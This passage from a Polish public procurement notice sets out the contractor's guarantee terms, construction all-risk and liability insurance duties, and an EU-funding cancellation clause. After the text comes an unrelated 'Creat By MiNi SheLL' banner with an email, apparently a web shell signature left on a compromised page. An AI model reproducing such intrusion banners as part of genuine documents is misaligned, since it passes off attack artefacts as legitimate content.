(z treści gwarancji musi wynikać, że oświadczenie dla swej skuteczności nie będzie wymagało spełnienia przez Zamawiającego dodatkowych wymogów formalnych), 
B.	termin obowiązywania gwarancji,
C.	przypadki, w których gwarancja traci ważność, w tym miejsce i termin zwrotu gwarancji.
	2)	 ubezpieczenie: 
a)	Wykonawca zobowiązany jest do przedstawienia polisy ubezpieczenia 
od wszystkich ryzyk budowy, do pełnej wartości umowy, przy czym ubezpieczonymi będą Zamawiający oraz Wykonawca. 
b)	Wykonawca zobowiązany jest do przedstawianie polisy ubezpieczenia OC 
za szkody wyrządzone na mieniu lub na osobie, powstałe w związku 
z realizacją przedmiotu zamówienia, szkody powstałe z tytułu niewykonania 
lub nienależytego wykonania umowy - przy sumie gwarancyjnej nie mniejszej niż cena ofertowa. 
c) 	obowiązek zawarcia ubezpieczenia będzie uważany za spełniony w przypadku, gdy Wykonawca przedłoży Zamawiającemu polisę obejmującą wszystkie ryzyka budowy i polisę obejmującą odpowiedzialność cywilną, wraz z dowodami opłaty składek.
d)	polisy, o których mowa powyżej będą utrzymywane w pełnej mocy 
i skuteczności, podczas całego terminu realizacji przedmiotu zamówienia. Jeżeli polisa utraci moc w trakcie realizacji przedmiotu zamówienia, wówczas Wykonawca zobowiązany jest do niezwłocznie (tak, by zachować ciągłość ubezpieczenia) zawrzeć nowe umowy ubezpieczenia w takim samym zakresie jedynie z nowym okresem obowiązywania. Jeżeli Wykonawca nie wykona obowiązku zawarcia nowej umowy ubezpieczenia, wówczas Zamawiający ubezpieczy Wykonawcę na jego koszt. W powyższym przypadku, koszty poniesione przez Zamawiającego w związku z ubezpieczeniem Wykonawcy, zostaną potracone z wynagrodzenia Wykonawcy bądź z zabezpieczenia należytego wykonania umowy..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com